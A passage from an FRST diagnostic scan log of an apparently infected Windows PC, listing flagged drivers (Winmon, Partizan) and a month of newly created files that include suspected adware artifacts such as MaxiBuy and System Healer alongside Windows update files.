R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [52816 2016-08-03] (Toshiba Client Solutions Co., Ltd.)
S3 WdBoot; C:\Windows\system32\drivers\wd\WdBoot.sys [46072 2018-04-26] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\wd\WdFilter.sys [313888 2018-04-26] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [61472 2018-04-26] (Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-24] () [File not signed] <==== ATTENTION
U0 Partizan; system32\drivers\Partizan.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 20:39 - 2018-06-11 20:42 - 000030235 _____ C:\Users\Craciun\Desktop\FRST.txt
2018-06-11 20:37 - 2018-06-11 20:39 - 000000000 ____D C:\FRST
2018-06-11 20:36 - 2018-06-11 20:36 - 002413056 _____ (Farbar) C:\Users\Craciun\Desktop\FRST64.exe
2018-06-11 07:58 - 2018-06-11 07:58 - 000000000 ___HD C:\OneDriveTemp
2018-06-09 18:22 - 2018-06-09 18:40 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\MaxiBuy
2018-06-09 18:22 - 2018-06-09 18:22 - 000003464 _____ C:\Windows\System32\Tasks\MaxiBuy2
2018-06-09 18:22 - 2018-06-09 18:22 - 000003454 _____ C:\Windows\System32\Tasks\MaxiBuy
2018-06-09 18:22 - 2018-06-09 18:22 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Python
2018-06-09 18:21 - 2018-06-09 18:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maxi Buy
2018-06-09 18:21 - 2018-06-09 18:22 - 000000000 ____D C:\Program Files (x86)\Maxi Buy
2018-06-08 22:09 - 2018-06-08 22:09 - 000029203 _____ C:\Users\Craciun\Desktop\attach.txt
2018-06-08 22:09 - 2018-06-08 22:08 - 000035804 _____ C:\Users\Craciun\Desktop\dds.txt
2018-06-08 21:30 - 2018-06-08 21:45 - 000003608 _____ C:\Users\Craciun\Desktop\Rkill.txt
2018-06-08 10:55 - 2018-06-08 10:55 - 000001302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2018-06-08 10:55 - 2018-06-08 10:55 - 000001290 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2018-06-08 10:39 - 2018-06-08 10:39 - 000196260 _____ C:\Windows\ntbtlog.txt
2018-06-08 09:05 - 2018-06-11 20:31 - 000003890 _____ C:\Windows\System32\Tasks\Update_4.0.8
2018-06-08 09:05 - 2018-06-08 09:05 - 000000000 ____D C:\Program Files\SystemaRev
2018-06-07 20:22 - 2018-06-09 18:41 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\bsvctp
2018-06-07 20:17 - 2018-06-07 20:17 - 000016802 _____ C:\Windows\System32\Tasks\Sawmenger XP
2018-06-07 07:52 - 2018-06-11 20:31 - 000003878 _____ C:\Windows\System32\Tasks\MainPMgr
2018-06-04 19:53 - 2018-06-04 19:53 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\schedsvc
2018-06-02 16:30 - 2018-06-03 08:46 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\gsvc
2018-05-30 20:48 - 2018-05-30 19:55 - 000094208 _____ (scaxvnlzpnrzqclaez) C:\Users\Craciun\AppData\Roaming\command.dll
2018-05-30 20:48 - 2018-05-30 19:05 - 000623616 _____ (rsltggjgfwnwdwxcud) C:\Users\Craciun\AppData\Roaming\product.dll
2018-05-27 00:14 - 2018-06-11 20:31 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SystemaRev
2018-05-26 14:23 - 2018-05-27 09:38 - 000000000 ____D C:\Program Files (x86)\SystemHealer
2018-05-26 14:23 - 2018-05-26 14:32 - 000000000 ____D C:\ProgramData\Subair
2018-05-26 14:23 - 2018-05-26 14:24 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-26 14:23 - 2018-05-26 14:24 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-26 14:23 - 2018-05-26 14:23 - 001895382 _____ C:\Users\Craciun\AppData\Local\Subity.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 000003416 _____ C:\Windows\System32\Tasks\System Healer Monitor
2018-05-26 14:23 - 2018-05-26 14:23 - 000003408 _____ C:\Windows\System32\Tasks\System Healer Delayed
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\System Healer
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\ProgramData\Subairs
2018-05-26 14:23 - 2018-05-26 14:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2018-05-26 14:22 - 2018-05-26 14:22 - 007611392 _____ C:\Users\Craciun\AppData\Local\agent.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 001987417 _____ C:\Users\Craciun\AppData\Local\Biojob.tst
2018-05-26 14:22 - 2018-05-26 14:22 - 000126464 _____ C:\Users\Craciun\AppData\Local\noah.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000070896 _____ C:\Users\Craciun\AppData\Local\Config.xml
2018-05-26 14:22 - 2018-05-26 14:22 - 000018432 _____ C:\Users\Craciun\AppData\Local\Main.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000005568 _____ C:\Users\Craciun\AppData\Local\md.xml
2018-05-26 14:22 - 2018-05-26 14:20 - 002136576 _____ (TODO: <Company name>) C:\Users\Craciun\AppData\Local\Biojob.exe
2018-05-26 14:21 - 2018-05-26 14:24 - 000000000 ____D C:\ProgramData\PrefsSecure
2018-05-26 14:21 - 2018-05-26 14:21 - 000278510 _____ C:\Users\Craciun\AppData\Local\Statphase.bin
2018-05-26 11:53 - 2018-05-26 11:53 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SUPERAntiSpyware.com
2018-05-26 11:52 - 2018-05-26 11:52 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2018-05-26 11:51 - 2018-05-26 11:54 - 000000000 ____D C:\Program Files\SUPERAntiSpyware
2018-05-26 11:51 - 2018-05-26 11:51 - 000000000 ____D C:\ProgramData\SUPERAntiSpyware.com
2018-05-25 17:40 - 2018-05-27 09:39 - 000000000 ____D C:\Users\Craciun\AppData\Local\D3DSCache
2018-05-25 17:30 - 2018-06-11 07:59 - 000003292 _____ C:\Windows\System32\Tasks\MRT
2018-05-25 17:28 - 2018-05-25 17:28 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-05-25 17:28 - 2018-05-25 17:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-05-25 17:28 - 2018-04-26 05:36 - 000152184 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2018-05-25 07:50 - 2018-05-27 11:02 - 000000000 ____D C:\sysg
2018-05-24 22:54 - 2018-05-24 08:40 - 000001320 _____ C:\Windows\system32\Drivers\etc\hosts.old
2018-05-24 11:40 - 2018-05-24 11:45 - 000000000 ____D C:\Windows\system32\config\bbimigrate
2018-05-24 11:40 - 2018-05-24 11:40 - 000000000 ___DL C:\Users\Public\Recorded TV (2)
2018-05-24 11:37 - 2018-05-24 11:40 - 000000000 ____D C:\Windows\ServiceProfiles
2018-05-24 11:37 - 2018-05-24 11:37 - 000008192 _____ C:\Windows\system32\config\userdiff
2018-05-24 11:33 - 2018-05-24 11:33 - 025848832 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 023862272 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 022707712 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 022002688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 021389360 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 020383720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 019525120 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 019399168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 013570560 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 012712960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 012500992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 011903488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 009159064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 008623104 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 008188928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007987712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007583232 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007519992 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 007436624 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006661632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006569952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 006044104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 005951488 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 005782528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004929024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004867072 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004706816 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004372992 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 004070400 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003732800 _____ C:\Windows\system32\Windows.Mirage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003712000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003655168 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 003440640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003392512 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003389952 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003320320 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003283400 _____ (Microsoft Corporation) C:\Windows\system32\CoreUIComponents.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003086336 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 003015168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002961408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002902528 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002900992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002897408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002841312 _____ C:\Windows\SysWOW64\Windows.Mirage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002835864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002753040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002700800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002486976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreUIComponents.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002422168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002366976 _____ (Microsoft Corporation) C:\Windows\system32\WebRuntimeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002242208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 002236928 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 002170368 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001953280 _____ C:\Windows\system32\rdpnano.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001855488 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001817088 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001664512 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001636352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001634800 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001586176 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001585664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001565592 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001550848 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001534976 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001466368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001456616 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-05-24 11:33 - 2018-05-24 11:33 - 001454016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001426328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001421312 _____ (Microsoft Corporation) C:\Windows\system32\rdpbase.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001380864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001258280 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001235968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpbase.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001191168 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001174424 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001160192 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 001063320 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2018-05-24 11:33 - 2018-05-24 11:33 - 001034624 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 001012120 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000976384 _____ (Microsoft Corporation) C:\Windows\system32\Spectrum.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000960512 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000944640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Mirage.Internal.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000933376 _____ (Microsoft Corporation) C:\Windows\system32\rasapi32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000917504 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000898560 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000894464 _____ (Microsoft Corporation) C:\Windows\system32\webplatstorageserver.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000885848 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000860160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasapi32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000836608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000826776 _____ (Microsoft Corporation) C:\Windows\system32\AppVClient.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000814592 _____ (Microsoft Corporation) C:\Windows\system32\EdgeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000788216 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000786168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000776880 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000775680 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000758272 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000749976 _____ (Microsoft Corporation) C:\Windows\system32\AppVReporting.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000733992 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000709816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000705944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000695296 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2018-05-24 11:33 - 2018-05-24 11:33 - 000669184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000668672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000665320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000658432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000652184 _____ (Microsoft Corporation) C:\Windows\system32\AppVPublishing.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000624128 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000615424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EdgeManager.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000613376 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs4.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000606448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000604568 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000596480 _____ (Microsoft Corporation) C:\Windows\system32\updatehandlers.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000585728 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs3.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000584192 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbonRes.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000581120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hhctrl.ocx
2018-05-24 11:33 - 2018-05-24 11:33 - 000578560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webplatstorageserver.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000567136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000559968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000553984 _____ (Microsoft Corporation) C:\Windows\system32\PerceptionSimulationExtensions.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000543744 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000524800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000494488 _____ (Microsoft Corporation) C:\Windows\system32\WerFault.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000474624 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs2.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000473496 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.rs1.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000434584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 000399768 _____ (Microsoft Corporation) C:\Windows\system32\AppVScripting.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000392192 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000382872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000344064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.th.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000272288 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000269216 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave_secure.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\MixedReality.Broker.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000241664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.win81.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000171520 _____ (Microsoft Corporation) C:\Windows\system32\itss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000170904 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2018-05-24 11:33 - 2018-05-24 11:33 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.Analog.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000154112 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\SharedPCCSP.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000150016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\itss.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000143360 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.win8rtm.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000134552 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000117760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\wcimage.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000002560 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2018-05-24 11:33 - 2018-05-24 11:33 - 000001312 _____ C:\Windows\system32\tcbres.wim
2018-05-24 11:25 - 2018-05-24 11:25 - 007702016 _____ (Microsoft Corporation) C:\Windows\system32\NL7Models0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 007406080 _____ (Microsoft Corporation) C:\Windows\system32\NL7Data0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 007242240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NL7Data0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 002454528 _____ (Microsoft Corporation) C:\Windows\system32\NL7Lexicons0011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000712704 _____ (Microsoft Corporation) C:\Windows\system32\MSWB70011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000516096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSWB70011.dll
2018-05-24 11:25 - 2018-05-24 11:25 - 000002060 _____ C:\Windows\system32\noise.jpn
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files\Reference Assemblies
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files\MSBuild
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2018-05-24 11:25 - 2018-05-24 11:25 - 000000000 ____D C:\Program Files (x86)\MSBuild
2018-05-24 11:24 - 2018-05-24 11:24 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
